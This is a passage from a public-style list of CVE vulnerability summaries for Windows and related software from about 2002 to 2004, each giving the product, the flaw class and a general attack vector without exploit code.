code in the Local Machine zone and execute arbitrary programs. [CVE-2004-0119] The Negotiate Security Software Provider (SSP) interface in Windows 2000, Windows XP, and Windows Server 2003, allows remote attackers to cause a denial of service (crash from null dereference) or execute arbitrary code via a crafted SPNEGO NegTokenInit request during authentication protocol selection. [CVE-2004-0118] The component for the Virtual DOS Machine (VDM) subsystem in Windows NT 4.0 and Windows 2000 does not properly validate system structures, which allows local users to access protected kernel memory and execute arbitrary code. [CVE-2004-0117] Unknown vulnerability in the H.323 protocol implementation in Windows 98, Windows 2000, Windows XP, and Windows Server 2003 allows remote attackers to execute arbitrary code. [CVE-2004-0115] VirtualPC_Services in Microsoft Virtual PC for Mac 6.0 through 6.1 allows local attackers to truncate and overwrite arbitrary files, and execute arbitrary code, via a symlink attack on the VPCServices_Log temporary file. [CVE-2004-0090] Unknown vulnerability in Windows File Sharing for Mac OS X 10.1.5 through 10.3.2 does not "shutdown properly," which has unknown impact and attack vectors. [CVE-2004-0069] Format string vulnerability in HD Soft Windows FTP Server 1.6 and earlier allows remote attackers to execute arbitrary code via format string specifiers in the username, which is processed by the wscanf function. [CVE-2003-1590] Unspecified vulnerability in Sun ONE (aka iPlanet) Web Server 6.0 SP3 through SP5 on Windows allows remote attackers to cause a denial of service (daemon crash) via unknown vectors. [CVE-2003-1589] Unspecified vulnerability in Sun ONE (aka iPlanet) Web Server 4.1 before SP13 and 6.0 before SP6 on Windows allows attackers to cause a denial of service (daemon crash) via unknown vectors. [CVE-2003-1582] Microsoft Internet Information Services (IIS) 6.0, when DNS resolution is enabled for client IP addresses, allows remote attackers to inject arbitrary text into log files via an HTTP request in conjunction with a crafted DNS response, as demonstrated by injecting XSS sequences, related to an "Inverse Lookup Log Corruption (ILLC)" issue. [CVE-2003-1579] Sun ONE (aka iPlanet) Web Server 6 on Windows, when DNS resolution is enabled for client IP addresses, uses a logging format that does not identify whether a dotted quad represents an unresolved IP address, which allows remote attackers to spoof IP addresses via crafted DNS responses containing numerical top-level domains, as demonstrated by a forged 123.123.123.123 domain name, related to an "Inverse Lookup Log Corruption (ILLC)" issue. [CVE-2003-1569] GoAhead WebServer before 2.1.5 on Windows 95, 98, and ME allows remote attackers to cause a denial of service (daemon crash) via an HTTP request with a (1) con, (2) nul, (3) clock$, or (4) config$ device name in a path component, different vectors than CVE-2001-0385. [CVE-2003-1567] The undocumented TRACK method in Microsoft Internet Information Services (IIS) 5.0 returns the content of the original request in the body of the response, which makes it easier for remote attackers to steal cookies and authentication credentials, or bypass the HttpOnly protection mechanism, by using TRACK to read the contents of the HTTP headers that are returned in the response, a technique that is similar to cross-site tracing (XST) using HTTP TRACE. [CVE-2003-1566] Microsoft Internet Information Services (IIS) 5.0 does not log requests that use the TRACK method, which allows remote attackers to obtain sensitive information without detection. [CVE-2003-1559] Microsoft Internet Explorer 5.22, and other 5 through 6 SP1 versions, sends Referer headers containing https:// URLs in requests for http:// URLs, which allows remote attackers to obtain potentially sensitive information by reading Referer log data. [CVE-2003-1544] Unrestricted critical resource lock in Terminal Services for Windows 2000 before SP4 and Windows XP allows remote authenticated users to cause a denial of service (reboot) by obtaining a read lock on msgina.dll, which prevents msgina.dll from being loaded. [CVE-2003-1524] PGPi PGPDisk 6.0.2i does not unmount a PGP partition when the switch user function in Windows XP is used, which could allow local users to access data on another user's PGP partition. [CVE-2003-1505] Microsoft Internet Explorer 6.0 allows remote attackers to cause a denial of service (crash) by creating a web page or HTML e-mail with a textarea in a div element whose scrollbar-base-color is modified by a CSS style, which is then moved. [CVE-2003-1484] Microsoft Internet Explorer 6.0 SP1 allows remote attackers to cause a denial of service (crash) by creating a DHTML link that uses the AnchorClick "A" object with a blank href attribute. [CVE-2003-1482] The backup configuration file for Microsoft MN-500 wireless base station stores administrative passwords in plaintext, which allows local users to gain access. [CVE-2003-1448] Memory leak in the Windows 2000 kernel allows remote attackers to cause a denial of service (SMB request hang) via a NetBIOS continuation packet. [CVE-2003-1407] Buffer overflow in cmd.exe in Windows NT 4.0 may allow local users to execute arbitrary code via a long pathname argument to the cd command. [CVE-2003-1378] Microsoft Outlook Express 6.0 and Outlook 2000, with the security zone set to Internet Zone, allows remote attackers to execute arbitrary programs via an HTML email with the CODEBASE parameter set to the program, a vulnerability similar to CAN-2002-0077. [CVE-2003-1357] ProxyView has a default administrator password of Administrator for Embedded Windows NT, which allows remote attackers to gain access. [CVE-2003-1328] The showHelp() function in Microsoft Internet Explorer 5.01, 5.5, and 6.0 supports certain types of pluggable protocols that allow remote attackers to bypass the cross-domain security model and execute arbitrary code, aka "Improper Cross Domain Security Validation with ShowHelp functionality." [CVE-2003-1326] Microsoft Internet Explorer 5.5 and 6.0 allows remote attackers to bypass the cross-domain security model to run malicious script or arbitrary programs via dialog boxes, aka "Improper Cross Domain Security Validation with dialog box." [CVE-2003-1306] Microsoft URLScan 2.5, with the RemoveServerHeader option enabled, allows remote attackers to obtain sensitive information (server name and version) via an HTTP request that generates certain errors such as 400 "Bad Request," which leak the Server header in the response. [CVE-2003-1305] Microsoft Internet Explorer allows remote attackers to cause a denial of service (resource consumption) via a Javascript src attribute that recursively loads the current web page. [CVE-2003-1233] Pedestal Software Integrity Protection Driver (IPD) 1.3 and earlier allows privileged attackers, such as rootkits, to bypass file access restrictions to the Windows kernel by using the NtCreateSymbolicLinkObject function to create a symbolic link to (1) \Device\PhysicalMemory or (2) to a drive letter using the subst command. [CVE-2003-1227] PHP remote file include vulnerability in index.php for Gallery 1.4 and 1.4-pl1, when running on Windows or in Configuration mode on Unix, allows remote attackers to inject arbitrary PHP code via a URL in the GALLERY_BASEDIR parameter, a different vulnerability than CVE-2002-1412. NOTE: this issue might be exploitable only during installation, or if the administrator has not run a security script after installation. [CVE-2003-1142] Help in NIPrint LPD-LPR Print Server 4.10 and earlier executes Windows Explorer with SYSTEM privileges, which allows local users to gain privileges. [CVE-2003-1127] Whale Communications e-Gap 2.5 on Windows 2000 allows remote attackers to obtain the source code for the login page via the HTTP TRACE method, which bypasses the preprocessor. [CVE-2003-1126] Unknown vulnerability in SunOne/iPlanet Web Server SP3 through SP5 on Windows platforms allows remote attackers to cause a denial of service. [CVE-2003-1027] Internet Explorer 5.01 through 6 SP1 allows remote attackers to direct drag and drop behaviors and other mouse click actions to other windows by using method caching (SaveRef) to access the window.moveBy method, which is otherwise inaccessible, as demonstrated by HijackClickV2, a different vulnerability than CVE-2003-0823, aka the "Function Pointer Drag and Drop Vulnerability." [CVE-2003-0995] Buffer overflow in the Microsoft Message Queue Manager (MSQM) allows remote attackers to cause a denial of service (RPC service crash) via a queue registration request. [CVE-2003-0910] The NtSetLdtEntries function in the programming interface for the Local Descriptor Table (LDT) in Windows NT 4.0 and Windows 2000 allows local attackers to gain access to kernel memory and execute arbitrary code via an expand-down data segment descriptor descriptor that points to protected memory. [CVE-2003-0909] Windows XP allows local users to execute arbitrary programs by creating a task at an elevated privilege level through the eventtriggers.exe command-line tool or the Task Scheduler service, aka "Windows Management Vulnerability." [CVE-2003-0905] Unknown vulnerability in Windows Media Station Service and Windows Media Monitor Service components of Windows Media Services 4.1 allows remote attackers to cause a denial of service (disallowing new connections) via a certain sequence of TCP/IP packets. [CVE-2003-0904] Microsoft Exchange 2003 and Outlook Web Access (OWA), when configured to use NTLM authentication, does not properly reuse HTTP connections, which can cause OWA users to view mailboxes of other users when Kerberos has been disabled as an authentication method for IIS 6.0, e.g. when SharePoint Services 2.0 is installed. [CVE-2003-0903] Buffer overflow in a component of Microsoft Data Access Components (MDAC) 2.5 through 2.8 allows remote attackers to execute arbitrary code via a malformed UDP response to a broadcast request. [CVE-2003-0897] "Shatter" vulnerability in CommCtl32.dll in Windows XP may allow local users to execute arbitrary code by sending (1) BCM_GETTEXTMARGIN or (2) BCM_SETTEXTMARGIN button control messages to privileged applications. [CVE-2003-0844] mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode without the Apache log, allows local users to overwrite arbitrary files via (1) a symlink attack on predictable temporary filenames on Unix systems, or (2) an NTFS hard link on Windows systems when the "Strengthen default permissions of internal system objects" policy is not enabled. [CVE-2003-0837] Stack-based buffer overflow in IBM DB2 Universal Data Base 7.2 for Windows, before Fixpak 10a, allows attackers with "Connect" privileges to execute arbitrary code via the INVOKE command. [CVE-2003-0824] Unknown vulnerability in the SmartHTML interpreter (shtml.dll) in Microsoft FrontPage Server Extensions 2000 and 2002, and Microsoft SharePoint Team Services 2002, allows remote attackers to cause a denial of service (response failure) via a certain request. [CVE-2003-0823] Internet Explorer 6 SP1 and earlier allows remote attackers to direct drag and drop behaviors and other mouse click actions to other windows by calling the window.moveBy method, aka HijackClick, a different vulnerability than CVE-2003-1027. [CVE-2003-0822] Buffer overflow in the debug functionality in fp30reg.dll of Microsoft FrontPage Server Extensions (FPSE) 2000 and 2002 allows remote attackers to execute arbitrary code via a crafted chunked encoded request. [CVE-2003-0821] Microsoft Excel 97, 2000, and 2002 allows remote attackers to execute arbitrary code via a spreadsheet with a malicious XLM (Excel 4) macro that bypasses the macro security model. [CVE-2003-0820] Microsoft Word 97, 98(J), 2000, and 2002, and Microsoft Works Suites 2001 through 2004, do not properly check the length of the "Macro names" data value, which could allow remote attackers to execute arbitrary code via a buffer overflow attack. [CVE-2003-0819] Buffer overflow in the H.323 filter of Microsoft Internet Security and Acceleration Server 2000 allows remote attackers to execute arbitrary code in the Microsoft Firewall Service via certain H.323 traffic, as demonstrated by the NISCC/OUSPG PROTOS test suite for the H.225 protocol. [CVE-2003-0813] A multi-threaded race condition in the Windows RPC DCOM functionality with the MS03-039 patch installed allows remote attackers to cause a denial of service (crash or reboot) by causing two threads to process the same RPC request, which causes one thread to use memory after it has been freed, a different vulnerability than CVE-2003-0352 (Blaster/Nachi), CVE-2003-0715, and CVE-2003-0528, and as demonstrated by certain exploits against those vulnerabilities. [CVE-2003-0812] Stack-based buffer overflow in a logging function for Windows Workstation Service (WKSSVC.DLL) allows remote attackers to execute arbitrary code via RPC calls that cause long entries to be written to a debug log file ("NetSetup.LOG"), as demonstrated using the NetAddAlternateComputerName API. [CVE-2003-0768] Microsoft ASP.Net 1.1 allows remote attackers to bypass the Cross-Site Scripting (XSS) and Script Injection protection feature via a null character in the beginning of a tag name. [CVE-2003-0767] Buffer overflow in RogerWilco graphical server 1.4.1.6 and earlier, dedicated server 0.32a and earlier for Windows, and 0.27 and earlier for Linux and BSD, allows remote attackers to cause a denial of service and execute arbitrary code via a client request with a large length value. [CVE-2003-0717] The Messenger Service for Windows NT through Server 2003 does not properly verify the length of the message, which allows remote attackers to execute arbitrary code via a buffer overflow attack. [CVE-2003-0712] Cross-site scripting (XSS) vulnerability in the HTML encoding for the Compose New Message form in Microsoft Exchange Server 5.5 Outlook Web Access (OWA) allows remote attackers to execute arbitrary web script. [CVE-2003-0711] Stack-based buffer overflow in the PCHealth system in the Help and Support Center function in Windows XP and Windows Server 2003 allows remote attackers to execute arbitrary code via a long query in an HCP URL. [CVE-2003-0666] Buffer overflow in Microsoft Wordperfect Converter allows remote attackers to execute arbitrary code via modified data offset and data size parameters in a Corel WordPerfect file. [CVE-2003-0665] Buffer overflow in the ActiveX control for Microsoft Access Snapshot Viewer for Access 97, 2000, and 2002 allows remote attackers to execute arbitrary code via long parameters to the control. [CVE-2003-0664] Microsoft Word 2002, 2000, 97, and 98(J) does not properly check certain properties of a document, which allows attackers to bypass the macro security model and automatically execute arbitrary macros via a malicious document. [CVE-2003-0663] Unknown vulnerability in the Local Security Authority Subsystem Service (LSASS) in Windows 2000 domain controllers allows remote attackers to cause a denial of service via a crafted LDAP message. [CVE-2003-0661] The NetBT Name Service (NBNS) for NetBIOS in Windows NT 4.0, 2000, XP, and Server 2003 may include random memory in a response to a NBNS query, which could allow remote attackers to obtain sensitive information. [CVE-2003-0659] Buffer overflow in a function in User32.dll on Windows NT through Server 2003 allows local users to execute arbitrary code via long (1) LB_DIR messages to ListBox or (2) CB_DIR messages to ComboBox controls in a privileged application. [CVE-2003-0642] WatchGuard ServerLock for Windows 2000 before SL 2.0.4 allows local users to access kernel memory via a symlink attack on \Device\PhysicalMemory. [CVE-2003-0641] WatchGuard ServerLock for Windows 2000 before SL 2.0.3 allows local users to load arbitrary modules via the OpenProcess() function, as demonstrated using (1) a DLL injection attack, (2) ZwSetSystemInformation, and (3) API hooking in OpenProcess. [CVE-2003-0605] The RPC DCOM interface in Windows 2000 SP3 and SP4 allows remote attackers to cause a denial of service (crash), and local attackers to use the DoS to hijack the epmapper pipe to gain privileges, via certain messages to the __RemoteGetClassObject interface that cause a NULL pointer to be passed to the PerformScmStage function. [CVE-2003-0526] Cross-site scripting (XSS) vulnerability in Microsoft Internet Security and Acceleration (ISA) Server 2000 allows remote attackers to inject arbitrary web script via a URL containing the script in the domain name portion, which is not properly cleansed in the default error pages (1) 500.htm for "500 Internal Server error" or (2) 404.htm for "404 Not Found." [CVE-2003-0525] The getCanonicalPath function in Windows NT 4.0 may free memory that it does not own and cause heap corruption, which allows attackers to cause a denial of service (crash) via requests that cause a long file name to be passed to getCanonicalPath, as demonstrated on the IBM JVM using a long string to the java.io.getCanonicalPath Java method. [CVE-2003-0519] Certain versions of Internet Explorer 5 and 6, in certain Windows environments, allow remote attackers to cause a denial of service (freeze) via a URL to C:\aux (MS-DOS device name) and possibly other devices. [CVE-2003-0513] Microsoft Internet Explorer allows remote attackers to bypass intended cookie access restrictions on a web application via "%2e%2e" (encoded dot dot) directory traversal sequences in a URL, which causes Internet Explorer to send the cookie outside the specified URL subsets, e.g. to a vulnerable application that runs on the same server as the target application. [CVE-2003-0507] Stack-based buffer overflow in Active Directory in Windows 2000 before SP4 allows remote attackers to cause a denial of service (reboot) and possibly execute arbitrary code via an LDAP version 3 search request with a large number of (1) "AND," (2) "OR," and possibly other statements, which causes LSASS.EXE to crash. [CVE-2003-0506] Microsoft NetMeeting 3.01 2000 before SP4 allows remote attackers to cause a denial of service (shutdown of NetMeeting conference) via malformed packets, as demonstrated via the chat conversation. [CVE-2003-0505] Directory traversal vulnerability in Microsoft NetMeeting 3.01 2000 before SP4 allows remote attackers to read arbitrary files via "..\.." (dot dot) sequences in a file transfer request. [CVE-2003-0503] Buffer overflow in the ShellExecute API function of SHELL32.DLL in Windows 2000 before SP4 may allow attackers to cause a denial of service or execute arbitrary code via a long third argument. [CVE-2003-0469] Buffer overflow in the HTML Converter (HTML32.cnv) on various Windows operating systems allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via cut-and-paste operation, as demonstrated in Internet Explorer 5.0 using a long "align" argument in an HR tag. [CVE-2003-0460] The rotatelogs program on Apache before 1.3.28, for Windows and OS/2 systems, does not properly ignore certain control characters that are received over the pipe, which could allow remote attackers to cause a denial of service. [CVE-2003-0446] Cross-site scripting (XSS) in Internet Explorer 5.5 and 6.0, possibly in a component that is also used by other Microsoft products, allows remote attackers to insert arbitrary web script via an XML file that contains a parse error, which inserts the script in the resulting error message. [CVE-2003-0414] The installation of Sun ONE Application Server 7.0 for Windows 2000/XP creates a statefile with world-readable permissions, which allows local users to gain privileges by reading a plaintext password in the statefile. [CVE-2003-0413] Cross-site scripting (XSS) vulnerability in the webapps-simple sample application for (1) Sun ONE Application Server 7.0 for Windows 2000/XP or (2) Sun Java System Web Server 6.1 allows remote attackers to insert arbitrary web script or HTML via an HTTP request that generates an "Invalid JSP file" error, which inserts the text in the resulting error message. [CVE-2003-0412] Sun ONE Application Server 7.0 for Windows 2000/XP does not log the complete URI of a long HTTP request, which could allow remote attackers to hide malicious activities. [CVE-2003-0411] Sun ONE Application Server 7.0 for Windows 2000/XP allows remote attackers to obtain JSP source code via a request that uses the uppercase ".JSP" extension instead of the lowercase .jsp extension. [CVE-2003-0389] Cross-site scripting (XSS) vulnerability in the secure redirect function of RSA ACE/Agent 5.0 for Windows, and 5.x for Web, allows remote attackers to insert arbitrary web script and possibly cause users to enter a passphrase via a GET request containing the script. [CVE-2003-0353] Buffer overflow in a component of SQL-DMO for Microsoft Data Access Components (MDAC) 2.5 through 2.7 allows remote attackers to execute arbitrary code via a long response to a broadcast request to UDP port 1434. [CVE-2003-0350] The control for listing accessibility options in the Accessibility Utility Manager on Windows 2000 (ListView) does not properly handle Windows messages, which allows local users to execute arbitrary code via a "Shatter" style message to the Utility Manager that references a user-controlled callback function. [CVE-2003-0347] Heap-based buffer overflow in VBE.DLL and VBE6.DLL of Microsoft Visual Basic for Applications (VBA) SDK 5.0 through 6.3 allows remote attackers to execute arbitrary code via a document with a long ID parameter. [CVE-2003-0344] Buffer overflow in Microsoft Internet Explorer 5.01, 5.5, and 6.0 allows remote attackers to execute arbitrary code via / (slash) characters in the Type property of an Object tag in a web page. [CVE-2003-0306] Buffer overflow in EXPLORER.EXE on Windows XP allows attackers to execute arbitrary code as the XP user via a desktop.ini file with a long .ShellClassInfo parameter. [CVE-2003-0268] SLWebMail 3 on Windows systems allows remote attackers to identify the full path of the server via invalid requests to DLLs such as WebMailReq.dll, which reveals the path in an error message. [CVE-2003-0267] ShowGodLog.dll in SLWebMail 3 on Windows systems allows remote attackers to read arbitrary files by directly calling ShowGodLog.dll with an argument specifying the full path of the target file. [CVE-2003-0266] Multiple buffer overflows in SLWebMail 3 on Windows systems allows remote attackers to cause a denial of service and possibly execute arbitrary code via (1) a long Language parameter to showlogin.dll, (2) a long CompanyID parameter to recman.dll, (3) a long CompanyID parameter to admin.dll, or (4) a long CompanyID parameter to globallogin.dll. [CVE-2003-0232] Microsoft SQL Server 7, 2000, and MSDE allows local users to execute arbitrary code via a certain request to the Local Procedure Calls (LPC) port that leads to a buffer overflow. [CVE-2003-0231] Microsoft SQL Server 7, 2000, and MSDE allows local or remote authenticated users to cause a denial of service (crash or hang) via a long request to a named pipe. [CVE-2003-0230] Microsoft SQL Server 7, 2000, and MSDE allows local users to gain privileges by hijacking a named pipe during the authentication of another user, aka the "Named Pipe Hijacking" vulnerability. [CVE-2003-0226] Microsoft Internet Information Services (IIS) 5.0 and 5.1 allows remote attackers to cause a denial of service via a long WebDAV request with a (1) PROPFIND or (2) SEARCH method, which generates an error condition that is not properly handled. [CVE-2003-0225] The ASP function Response.AddHeader in Microsoft Internet Information Server (IIS) 4.0 and 5.0 does not limit memory requests when constructing headers, which allow remote attackers to generate a large header to cause a denial of service (memory consumption) with an ASP page. [CVE-2003-0224] Buffer overflow in ssinc.dll for Microsoft Internet Information Services (IIS) 5.0 allows local users to execute arbitrary code via a web page with a Server Side Include (SSI) directive with a long filename, aka "Server Side Include Web Pages Buffer Overrun." [CVE-2003-0223] Cross-site scripting vulnerability (XSS) in the ASP function responsible for redirection in Microsoft Internet Information Server (IIS) 4.0, 5.0, and 5.1 allows remote attackers to embed a URL containing script in a redirection message. [CVE-2003-0172] Buffer overflow in openlog function for PHP 4.3.1 on Windows operating system, and possibly other OSes, allows remote attackers to cause a crash and possibly execute arbitrary code via a long filename argument. [CVE-2003-0168] Buffer overflow in Apple QuickTime Player 5.x and 6.0 for Windows allows remote attackers to execute arbitrary code via a long QuickTime URL. [CVE-2003-0118] SQL injection vulnerability in the Document Tracking and Administration (DTA) website of Microsoft BizTalk Server 2000 and 2002 allows remote attackers to execute operating system commands via a request to (1) rawdocdata.asp or (2) RawCustomSearchField.asp containing an embedded SQL statement. [CVE-2003-0117] Buffer overflow in the HTTP receiver function (BizTalkHTTPReceive.dll ISAPI) of Microsoft BizTalk Server 2002 allows attackers to execute arbitrary code via a certain request to the HTTP receiver. [CVE-2003-0116] Microsoft Internet Explorer 5.01, 5.5 and 6.0 does not properly check the Cascading Style Sheet input parameter for Modal dialogs, which allows remote attackers to read files on the local system via a web page containing script that creates a dialog and then accesses the target files, aka "Modal Dialog script execution." [CVE-2003-0115] Microsoft Internet Explorer 5.01, 5.5 and 6.0 does not properly check parameters that are passed during third party rendering, which could allow remote attackers to execute arbitrary web script, aka the "Third Party Plugin Rendering" vulnerability, a different vulnerability than CVE-2003-0233. [CVE-2003-0114] The file upload control in Microsoft Internet Explorer 5.01, 5.5, and 6.0 allows remote attackers to automatically upload files from the local system via a web page containing a script to upload the files. [CVE-2003-0113] Buffer overflow in URLMON.DLL in Microsoft Internet Explorer 5.01, 5.5 and 6.0 allows remote attackers to execute arbitrary code via an HTTP response containing long values in (1) Content-type and (2) Content-encoding fields. [CVE-2003-0112] Buffer overflow in Windows Kernel allows local users to gain privileges by causing certain error messages to be passed to a debugger. [CVE-2003-0110] The Winsock Proxy service in Microsoft Proxy Server 2.0 and the Microsoft Firewall service in Internet Security and Acceleration (ISA) Server 2000 allow remote attackers to cause a denial of service (CPU consumption or packet storm) via a spoofed, malformed packet to UDP port 1745. [CVE-2003-0045] Jakarta Tomcat before 3.3.1a on certain Windows systems may allow remote attackers to cause a denial of service (thread hang and resource consumption) via a request for a JSP page containing an MS-DOS device name, such as aux.jsp. [CVE-2003-0017] Apache 2.0 before 2.0.44 on Windows platforms allows remote attackers to obtain certain files via an HTTP request that ends in certain illegal characters such as ">", which causes a different filename to be processed and served. [CVE-2003-0016] Apache before 2.0.44, when running on unpatched Windows 9x and Me operating systems, allows remote attackers to cause a denial of service or execute arbitrary code via an HTTP request containing MS-DOS device names. [CVE-2003-0011] Unknown vulnerability in the DNS intrusion detection application filter for Microsoft Internet Security and Acceleration (ISA) Server 2000 allows remote attackers to cause a denial of service (blocked traffic to DNS servers) via a certain type of incoming DNS request that is not properly handled. [CVE-2003-0010] Integer overflow in JsArrayFunctionHeapSort function used by Windows Script Engine for JScript (JScript.dll) on various Windows operating system allows remote attackers to execute arbitrary code via a malicious web page or HTML e-mail that uses a large array index value that enables a heap-based buffer overflow attack. [CVE-2003-0007] Microsoft Outlook 2002 does not properly handle requests to encrypt email messages with V1 Exchange Server Security certificates, which causes Outlook to send the email in plaintext, aka "Flaw in how Outlook 2002 handles V1 Exchange Server Security Certificates could lead to Information Disclosure." [CVE-2003-0002] Cross-site scripting vulnerability (XSS) in ManualLogin.asp script for Microsoft Content Management Server (MCMS) 2001 allows remote attackers to execute arbitrary script via the REASONTXT parameter. [CVE-2002-2435] The Cascading Style Sheets (CSS) implementation in Microsoft Internet Explorer 8.0 and earlier does not properly handle the :visited pseudo-class, which allows remote attackers to obtain sensitive information about visited web pages via a crafted HTML document, a related issue to CVE-2010-2264. [CVE-2002-2413] WebSite Pro 3.1.11.0 on Windows allows remote attackers to read script source code for files with extensions greater than 3 characters via a URL request that uses the equivalent 8.3 file name. [CVE-2002-2401] NT Virtual DOS Machine (NTVDM.EXE) in Windows 2000, NT and XP does not verify user execution permissions for 16-bit executable files, which allows local users to bypass the loader and execute arbitrary programs. [CVE-2002-2395] InterScan VirusWall 3.52 for Windows allows remote attackers to bypass virus protection and possibly execute arbitrary code via HTTP 1.1 gzip content encoding. [CVE-2002-2394] InterScan VirusWall 3.6 for Linux and 3.52 for Windows allows remote attackers to bypass virus protection and possibly execute arbitrary code via HTTP 1.1 chunked transfer encoding. [CVE-2002-2380] NetDSL ADSL Modem 800 with Microsoft Network firmware 5.5.11 allows remote attackers to gain access to configuration menus by sniffing undocumented usernames and passwords from network traffic. [CVE-2002-2328] Active Directory in Windows 2000, when supporting Kerberos V authentication and GSSAPI, allows remote attackers to cause a denial of service (hang) via an LDAP client that sets the page length to zero during a large request. [CVE-2002-2324] The "System Restore" directory and subdirectories, and possibly other subdirectories in the "System Volume Information" directory on Windows XP Professional, have insecure access control list (ACL) permissions, which allows local users to access restricted files and modify registry settings. [CVE-2002-2313] Eudora email client 5.1.1, with "use Microsoft viewer" enabled, allows remote attackers to execute arbitrary programs via an HTML email message containing a META refresh tag that references an embedded .mhtml file with ActiveX controls that execute a second embedded program, which is processed by Internet Explorer. [CVE-2002-2311] Microsoft Internet Explorer 6.0 and possibly others allows remote attackers to upload arbitrary file contents when users press a key corresponding to the JavaScript (1) event.ctrlKey or (2) event.shiftKey onkeydown event contained in a webpage. NOTE: it was reported that the vendor has disputed the severity of this issue. [CVE-2002-2275] Fortres 101 4.1 allows local users to bypass Fortres by pressing the Windows and "F" key together for 30 seconds, which opens multiple windows and eventually causes explorer.exe to crash, which then opens an unrestricted explorer.exe. [CVE-2002-2248] Buffer overflow in the sun.awt.windows.WDefaultFontCharset Java class implementation in Netscape 4.0 allows remote attackers to execute arbitrary code via an applet that calls the WDefaultFontCharset constructor with a long string and invokes the canConvert method. [CVE-2002-2224] Buffer overflow in PGPFreeware 7.03 running on Windows NT 4.0 SP6 allows remote attackers to cause a denial of service and possibly execute arbitrary code via crafted Internet Key Exchange (IKE) response packets, possibly including (1) a large Security Parameter Index (SPI) field, (2) large number of payloads, or (3) a long payload. [CVE-2002-2169] Cross-site scripting vulnerability AOL Instant Messenger (AIM) 4.5 and 4.7 for MacOS and Windows allows remote attackers to conduct unauthorized activities, such as adding buddies and groups to a user's buddy list, via a URL with a META HTTP-EQUIV="refresh" tag to an aim: URL. [CVE-2002-2164] Buffer overflow in Microsoft Outlook Express 5.0, 5.5, and 6.0 allows remote attackers to cause a denial of service (crash) via a long <A HREF> link. [CVE-2002-2132] Windows File Protection (WFP) in Windows 2000 and XP does not remove old security catalog .CAT files, which could allow local users to replace new files with vulnerable old files that have valid hash codes. [CVE-2002-2101] Microsoft Outlook 2002 allows remote attackers to execute arbitrary JavaScript code, even when scripting is disabled, via an "about:" or "javascript:" URI in the href attribute of an "a" tag. [CVE-2002-2100] Microsoft Outlook 2002 allows remote attackers to embed bypass the file download restrictions for attachments via an HTML email message that uses an IFRAME to reference malicious content. [CVE-2002-2083] The Novell Netware client running on Windows 95 allows local users to bypass the login and open arbitrary files via the "What is this?" help feature, which can be launched from the Novell Netware login screen. [CVE-2002-2081] cphost.dll in Microsoft Site Server 3.0 allows remote attackers to cause a denial of service (disk consumption) via an HTTP POST of a file with a long TargetURL parameter, which causes Site Server to abort and leaves the uploaded file in c:\temp. [CVE-2002-2077] The DCOM client in Windows 2000 before SP3 does not properly clear memory before sending an "alter context" request, which may allow remote attackers to obtain sensitive information by sniffing the session. [CVE-2002-2070] SecureClean 3 build 2.0 does not clear Windows alternate data streams that are attached to files on NTFS file systems, which allows attackers to recover sensitive information that was supposed to be deleted. [CVE-2002-2069] PGP 6.x and 7.x does not clear Windows alternate data streams that are attached to files on NTFS file systems, which allows attackers to recover sensitive information that was supposed to be deleted. [CVE-2002-2068] Eraser 5.3 does not clear Windows alternate data streams that are attached to files on NTFS file systems, which allows attackers to recover sensitive information that was supposed to be deleted. [CVE-2002-2067] East-Tec Eraser 2002 does not clear Windows alternate data streams that are attached to files on NTFS file systems, which allows attackers to recover sensitive information that was supposed to be deleted. [CVE-2002-2066] BestCrypt BCWipe 1.0.7 and 2.0 through 2.35.1 does not clear Windows alternate data streams that are attached to files on NTFS file systems, which allows attackers to recover sensitive information that was supposed to be deleted. [CVE-2002-2062] Cross-site scripting (XSS) vulnerability in ftp.htt in Internet Explorer 5.5 and 6.0, when running on Windows 2000 with "Enable folder view for FTP sites" and "Enable Web content in folders" selected, allows remote attackers to inject arbitrary web script or HTML via the hostname portion of an FTP URL. [CVE-2002-2029] PHP, when installed on Windows with Apache and ScriptAlias for /php/ set to c:/php/, allows remote attackers to read arbitrary files and possibly execute arbitrary programs via an HTTP request for php.exe with a filename in the query string. [CVE-2002-2028] The screensaver on Windows NT 4.0, 2000, XP, and 2002 does not verify if a domain account has already been locked when a valid password is provided, which makes it easier for users with physical access to conduct brute force password guessing. [CVE-2002-2008] Apache Tomcat 4.0.3 for Windows allows remote attackers to obtain the web root path via an HTTP request for a resource that does not exist, such as lpt9, which leaks the information in an error message. [CVE-2002-1981] Microsoft SQL Server 2000 through SQL Server 2000 SP2 allows the "public" role to execute the (1) sp_MSSetServerProperties or (2) sp_MSsetalertinfo stored procedures, which allows attackers to modify configuration including SQL server startup and alert settings. [CVE-2002-1973] Buffer overflow in CHttpServer::OnParseError in the ISAPI extension (Isapi.cpp) when built using Microsoft Foundation Class (MFC) static libraries in Visual C++ 5.0, and 6.0 before SP3, as used in multiple products including BadBlue, allows remote attackers to cause a denial of service (access violation and crash) and possibly execute arbitrary code via a long query string that causes a parsing error. [CVE-2002-1940] LCC-Win32 3.2 compiler, when running on Windows 95, 98, or ME, writes portions of previously used memory after the import table, which could allow attackers to gain sensitive information. NOTE: it has been reported that this problem is due to the OS and not the application. [CVE-2002-1923] The default configuration in MySQL 3.20.32 through 3.23.52, when running on Windows, does not have logging enabled, which could allow remote attackers to conduct activities without detection. [CVE-2002-1921] The default configuration of MySQL 3.20.32 through 3.23.52, when running on Windows, does set the bind address to the loopback interface, which allows remote attackers to connect to the database. [CVE-2002-1918] Buffer overflow in Microsoft Active Data Objects (ADO) in Microsoft MDAC 2.5 through 2.7 allows remote attackers to have unknown impact with unknown attack vectors. NOTE: due to the lack of details available regarding this issue, perhaps it should be REJECTED. [CVE-2002-1908] Microsoft IIS 5.0 and 5.1 allows remote attackers to cause a denial of service (CPU consumption) via an HTTP request with a Host header that contains a large number of "/" (forward slash) characters. [CVE-2002-1876] Microsoft Exchange 2000 allows remote authenticated attackers to cause a denial of service via a large number of rapid requests, which consumes all of the licenses that are granted to Exchange by IIS. [CVE-2002-1875] Entercept Agent 2.5 agent for Windows, released before May 21, 2002, allows local administrative users to obtain the entercept agent password, which could allow the administrators to log on as the entercept_agent account and conceal their identity. [CVE-2002-1873] Microsoft Exchange 2000, when used with Microsoft Remote Procedure Call (MSRPC), allows remote attackers to cause a denial of service (crash or memory consumption) via malformed MSRPC calls. [CVE-2002-1872] Microsoft SQL Server 6.0 through 2000, with SQL Authentication enabled, uses weak password encryption (XOR), which allows remote attackers to sniff and decrypt the password. [CVE-2002-1869] Heysoft EventSave 5.1 and 5.2 and Heysoft EventSave+ 5.1 and 5.2 does not check whether the log file can be written to, which allows attackers to 